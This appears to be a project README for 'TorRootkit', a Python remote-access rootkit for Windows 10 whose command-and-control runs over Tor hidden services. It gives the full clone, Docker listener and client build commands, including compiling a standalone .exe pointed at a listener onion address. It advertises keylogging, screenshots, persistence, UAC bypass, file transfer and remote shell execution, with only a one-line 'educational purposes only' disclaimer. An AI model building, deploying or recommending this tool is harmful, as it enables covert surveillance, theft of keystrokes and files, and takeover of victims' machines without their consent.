A Python 3 standalone Windows 10 Rootkit. The networking works over tor hidden services.
- Clone with git:
git clone https://github.com/emcruise/TorRootkit.git
- Change directory to the repository:
cd ./TorRootkit
The listener is designed to run on linux.
- Build docker container:
sudo docker build -t listener .
- Run docker container:
sudo docker run -it listener
The client is designed to run on Windows 10.
- Change directory to client:
cd .\client
- Install all pip3 dependencies:
pip3 install -r requirements.txt
- Build executable from build.py:
- downloads Tor Expert Bundle
- bundles python3 interpreter and tor expert bundle into 1 standalone .exe file
python build.py <listener-onion-address> <listener-onion-port>
- Execute the bundled client:
.\dist\client.exe
Use for educational purposes only.
- Standalone executable, including python interpreter and tor expert bundle (~13MB)
- the whole communication works over tor hidden services which guarantees some degree of anonymity
- Listener can handle multiple clients
- Client auto reconnects
- cross-plattform compatibility
- Up- and Download functionality
- Screenshots
- Keylogging
- Persistence
- UAC-Bypass
Command | Explanation |
---|---|
help |
Shows the help menu |
^C or exit |
Exits the shell |
list |
lists all connected clients with their according index |
select <index> |
start shell with client |
Command | Explanation |
---|---|
help |
Shows the help menu |
^C or exit |
Exits the shell and returns to listener shell |
os <command> |
Executes a command in the clients shell and returns the output |
All contributions are appreciated.